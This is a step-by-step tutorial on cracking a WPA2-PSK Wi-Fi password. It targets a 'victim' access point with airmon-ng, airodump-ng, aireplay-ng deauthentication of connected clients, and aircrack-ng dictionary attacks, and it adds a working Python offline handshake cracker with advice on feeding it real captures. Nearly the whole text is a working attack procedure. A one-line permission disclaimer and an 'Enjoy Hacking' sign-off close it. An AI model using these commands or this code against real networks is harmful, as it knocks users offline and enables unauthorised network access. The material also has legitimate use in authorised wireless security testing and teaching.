In this tutorial we will learn to hack a WPA2-PSK password. Today most access points use Wi-Fi Protected Access II with a pre-shared key, known as WPA2-PSK.
WPA2-PSK uses a 4-way handshake to authenticate clients. The password itself is never sent over the air: both sides derive a key (the PMK) from the passphrase and the SSID, and the handshake carries random nonces plus a MIC (a keyed hash) computed from that key. If we capture the handshake we can try candidate passwords offline later: for each candidate we derive the key, recompute the MIC and compare it with the captured one. So this is an offline dictionary attack on the handshake, not a decryption of the password.
1. Put the wifi adapter in monitor mode.
Open the terminal, type "airmon-ng check kill" and press enter. This stops NetworkManager, wpa_supplicant and other processes that would otherwise keep switching the adapter back to managed mode or hopping channels.
Now type "airmon-ng start wlan0" and press enter. This will turn your wifi adapter into monitor mode. wlan0 is the name of my wifi adapter; if you want to see yours, type "iw dev" (or "ifconfig" on older systems) in your terminal and press enter. airmon-ng prints the name of the new monitor interface; on most drivers it is wlan0mon, which is the name used in the rest of this tutorial.
2. Find the available access points in range.
Now we have to find all the access points currently in our range. This gives us the information we need about our victim: its BSSID (the AP's MAC address), its channel, and the clients connected to it (listed in the STATION column at the bottom of the screen). To do that type "airodump-ng wlan0mon" and press enter. Press Ctrl-C once you have noted the target's BSSID and channel.
3. Select our target access point and capture the handshake.
As we discussed earlier, WPA2-PSK uses a 4-way handshake, and a client performs it every time it (re)connects. In this step we lock airodump-ng onto our target's channel and write everything it sees to a capture file, which we will attack later. Type "airodump-ng --bssid <BSSID of AP> --channel <channel no. of AP> --write <capture file prefix> wlan0mon" and leave it running while you do the next step.
eg:- airodump-ng --bssid 00:EC:0A:3F:C9:67 --channel 1 --write handshake wlan0mon
airodump-ng numbers its output files, so with the prefix "handshake" the capture is saved as handshake-01.cap.
4. Send deauthentication packets to a client.
We don't want to wait for a client to reconnect on its own, so in this step we send a few deauthentication frames to a client connected to our victim AP. The client is kicked off, reconnects right away, and airodump-ng (still running from step 3) captures the 4-way handshake. In a new terminal type "aireplay-ng --deauth <No. of packets to send> -a <BSSID of AP> -c <MAC of client> wlan0mon". -a is the AP's BSSID and -c is the MAC address of the client as shown in the STATION column; if you leave out -c the deauth is broadcast to every client of that AP.
eg:- "aireplay-ng --deauth 5 -a 00:EC:0A:3F:C9:67 -c CC:9F:7A:81:81:19 wlan0mon"
Then watch the top right corner of the airodump-ng window for the message "WPA handshake: <BSSID of AP>". If it does not show up, check that the monitor interface is on the AP's channel and send the deauth again; a client that is far away or idle may not reconnect on the first try.
5. Now the cracking part.
In this step we use aircrack-ng to crack the password with a dictionary file. aircrack-ng takes each word from the wordlist, derives the key from that word and the SSID, recomputes the handshake MIC and stops when it matches the captured one. For this attack to succeed the password must be in the wordlist. We can find a few wordlists in Kali Linux (like rockyou.txt, which ships compressed as /usr/share/wordlists/rockyou.txt.gz; unpack it with "gunzip /usr/share/wordlists/rockyou.txt.gz"). I have created my own wordlist and use that.
Before cracking, it is worth checking that the capture really contains a handshake: run "aircrack-ng ./handshake-01.cap" with no wordlist and it lists the networks in the file, showing "WPA (1 handshake)" next to the one we captured.
We type the following command.
"aircrack-ng -w <wordlist file> <captured handshake>"
eg:- aircrack-ng -w './wordlist.txt' './handshake-01.cap'
Now the cracking starts and we get the password, if it is present in the wordlist. WPA2 passphrases are 8 to 63 characters long, so aircrack-ng skips shorter words in the list.
Yes! We got the password. Now we put the adapter back into managed mode by typing "airmon-ng stop wlan0mon". Because "airmon-ng check kill" stopped NetworkManager in step 1, start it again with "systemctl start NetworkManager" (on Kali), and we are ready to connect to the wifi again.
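To show what aircrack-ng actually does in step 5, here is an added example (my own code, not aircrack-ng's and not from the original tutorial) that runs the same offline check in Python: PBKDF2 of each candidate passphrase with the SSID gives the PMK, the 802.11 PRF expands it into the PTK, and the first 16 bytes of the PTK (the KCK) sign the EAPOL-Key frame; a candidate is correct when the recomputed MIC equals the captured one. Because it has to run offline, the handshake is constructed rather than captured: the SSID "home-lab", the two MAC addresses, the nonces, the planted passphrase "correcthorse" and the small wordlist are all made-up test data, and build_handshake only exists to produce a valid message 2 of the 4-way handshake for the cracker to work on.

```python
#!/usr/bin/env python3
"""Offline WPA2-PSK dictionary check, i.e. what aircrack-ng does with a
captured 4-way handshake.  Added example for this tutorial, not aircrack-ng's
own code; the handshake below is constructed, not captured."""
import hashlib
import hmac

# Offset of the 16-byte Key MIC inside an EAPOL-Key frame:
# EAPOL header (4) + descriptor type (1) + key info (2) + key length (2)
# + replay counter (8) + key nonce (32) + key IV (16) + key RSC (8) + key ID (8)
MIC_OFFSET = 81


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits).
    This is the slow step: every candidate costs 4096 HMAC computations."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, length: int) -> bytes:
    """IEEE 802.11 PRF: HMAC-SHA1(key, label || 0x00 || data || counter), concatenated."""
    out = b""
    counter = 0
    while len(out) < length:
        out += hmac.new(key, label + b"\x00" + data + bytes([counter]), hashlib.sha1).digest()
        counter += 1
    return out[:length]


def ptk_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-384(PMK, "Pairwise key expansion",
    min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce)).
    The first 16 bytes are the KCK, the key that authenticates the handshake."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf(pmk, b"Pairwise key expansion", data, 48)


def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    """MIC over the EAPOL-Key frame with its own MIC field zeroed.
    Key descriptor version (low 3 bits of key info): 1 = HMAC-MD5 (WPA/TKIP),
    2 = HMAC-SHA1 truncated to 128 bits (WPA2/CCMP)."""
    version = int.from_bytes(eapol[5:7], "big") & 0x7
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * 16 + eapol[MIC_OFFSET + 16:]
    if version == 1:
        return hmac.new(kck, zeroed, hashlib.md5).digest()
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def crack(handshake: dict, wordlist):
    """Try each candidate passphrase; return the one whose MIC matches the capture, else None."""
    captured_mic = handshake["eapol"][MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        candidate = candidate.rstrip("\r\n")
        if not 8 <= len(candidate) <= 63:   # WPA passphrases are 8-63 chars; skip the rest
            continue
        pmk = pmk_from_passphrase(candidate, handshake["ssid"])
        ptk = ptk_from_pmk(pmk, handshake["ap_mac"], handshake["sta_mac"],
                           handshake["anonce"], handshake["snonce"])
        if hmac.compare_digest(eapol_mic(ptk[:16], handshake["eapol"]), captured_mic):
            return candidate
    return None


def build_handshake(passphrase, ssid, ap_mac, sta_mac, anonce, snonce) -> dict:
    """Construct message 2 of the 4-way handshake (client -> AP) with a valid MIC,
    standing in for the frame airodump-ng would have captured (test helper only)."""
    key_info = (0x010A).to_bytes(2, "big")   # descriptor version 2, pairwise, MIC bit set
    body = (b"\x02" + key_info + (16).to_bytes(2, "big") + b"\x00" * 8 + snonce
            + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8 + b"\x00" * 16 + b"\x00\x00")
    eapol = b"\x01\x03" + len(body).to_bytes(2, "big") + body
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid),
                       ap_mac, sta_mac, anonce, snonce)[:16]
    mic = eapol_mic(kck, eapol)
    return {"ssid": ssid, "ap_mac": ap_mac, "sta_mac": sta_mac,
            "anonce": anonce, "snonce": snonce,
            "eapol": eapol[:MIC_OFFSET] + mic + eapol[MIC_OFFSET + 16:]}


# Constructed sample: hypothetical SSID, MACs and nonces; the victim's passphrase is planted.
SAMPLE_HANDSHAKE = build_handshake(
    "correcthorse", "home-lab",
    bytes.fromhex("00ec0a3fc967"), bytes.fromhex("cc9f7a818119"),
    anonce=bytes(range(32)), snonce=bytes(range(100, 132)))
WORDLIST = ["12345678", "letmein123", "correcthorse", "hunter2hunter"]

if __name__ == "__main__":
    print("KEY FOUND:", crack(SAMPLE_HANDSHAKE, WORDLIST))
```

To run this against a real handshake-01.cap you would first pull the SSID from the beacon, the two MAC addresses, the ANonce from message 1 and the SNonce plus the whole EAPOL frame from message 2 (scapy can do this), and feed crack() an opened wordlist such as open("rockyou.txt", errors="ignore"). The cost is the PBKDF2 step, which is deliberately slow; that is also why a long random passphrase is out of reach of this attack.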
Don't use this on other people's wifi or on any network you don't have permission to test. Remember "A HUG is always better than HANDSHAKES".
Thanks for reading. Enjoy Hacking.